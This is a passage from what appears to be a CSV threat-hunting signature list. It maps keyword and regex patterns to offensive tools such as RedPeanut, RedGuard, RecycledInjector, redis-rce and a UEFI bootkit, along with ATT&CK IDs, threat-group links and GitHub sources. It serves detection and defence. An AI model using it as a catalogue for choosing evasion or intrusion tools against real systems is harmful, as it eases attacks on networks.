APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*recon-archy analyse*",".{0,1000}recon\-archy\sanalyse.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from 
scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy build*",".{0,1000}recon\-archy\sbuild.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy crawl*",".{0,1000}recon\-archy\scrawl.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*recon-archy-master*",".{0,1000}recon\-archy\-master.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*ReconUserGroupRoles.ps1*",".{0,1000}ReconUserGroupRoles\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*RecycledInjector.exe*",".{0,1000}RecycledInjector\.exe.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*RED_HAWK*",".{0,1000}RED_HAWK.{0,1000}","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. 
A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2823","820","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" "*Red-Baron*",".{0,1000}Red\-Baron.{0,1000}","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","366","74","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" "*RedByte1337/GraphSpy*",".{0,1000}RedByte1337\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*redelk_backend_name_c2*",".{0,1000}redelk_backend_name_c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redelk_backend_name_decoy*",".{0,1000}redelk_backend_name_decoy.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*RedGuard.log*",".{0,1000}RedGuard\.log.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*RedGuard/core*",".{0,1000}RedGuard\/core.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*RedGuard_x64.exe*",".{0,1000}RedGuard_x64\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*RedGuard_x86.exe*",".{0,1000}RedGuard_x86\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider 
- TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*redhuntlabs*",".{0,1000}redhuntlabs.{0,1000}","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*redhuntlabs/BucketLoot*",".{0,1000}redhuntlabs\/BucketLoot.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*RedHunt-OS*",".{0,1000}RedHunt\-OS.{0,1000}","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1195","182","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" "*Redirect LoadLibraryA to LdrLoadDll with spoofed ret addr !*",".{0,1000}Redirect\sLoadLibraryA\sto\sLdrLoadDll\swith\sspoofed\sret\saddr\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - 
TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*redis-rce*",".{0,1000}redis\-rce.{0,1000}","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","894","219","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" "*redlotus.efi*",".{0,1000}redlotus\.efi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*RedPeanut Smb server started*",".{0,1000}RedPeanut\sSmb\sserver\sstarted.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Models*",".{0,1000}RedPeanut\.Models.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*redpeanut.pfx*",".{0,1000}redpeanut\.pfx.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 
- T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Resources.*.txt",".{0,1000}RedPeanut\.Resources\..{0,1000}\.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Utility*",".{0,1000}RedPeanut\.Utility.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.C2*",".{0,1000}RedPeanutAgent\.C2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Core*",".{0,1000}RedPeanutAgent\.Core.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*RedPeanutAgent.cs*",".{0,1000}RedPeanutAgent\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Evasion*",".{0,1000}RedPeanutAgent\.Evasion.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Execution*",".{0,1000}RedPeanutAgent\.Execution.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Program*",".{0,1000}RedPeanutAgent\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutC2*",".{0,1000}RedPeanutC2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutCLI*",".{0,1000}RedPeanutCLI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutDBContext*",".{0,1000}RedPeanutDBContext.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutDBInitializer*",".{0,1000}RedPeanutDBInitializer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutHtaPowerShellScript*",".{0,1000}RedPeanutHtaPowerShellScript.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutHtaScript.hta*",".{0,1000}RedPeanutHtaScript\.hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed 
in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutInstallUtil.cs*",".{0,1000}RedPeanutInstallUtil\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutManager.cs*",".{0,1000}RedPeanutManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutMigrate.cs*",".{0,1000}RedPeanutMigrate\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutMSBuildScript.xml*",".{0,1000}RedPeanutMSBuildScript\.xml.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutPowershellScriptS*",".{0,1000}RedPeanutPowershellScriptS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutRP.cs*",".{0,1000}RedPeanutRP\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutShooter.*",".{0,1000}RedPeanutShooter\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutSpawn.cs*",".{0,1000}RedPeanutSpawn\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutSpawnTikiTorch.cs*",".{0,1000}RedPeanutSpawnTikiTorch\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed 
in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutVBAMacro.vba*",".{0,1000}RedPeanutVBAMacro\.vba.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedSiege/CIMplant*",".{0,1000}RedSiege\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*RedSiege/GraphStrike*",".{0,1000}RedSiege\/GraphStrike.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 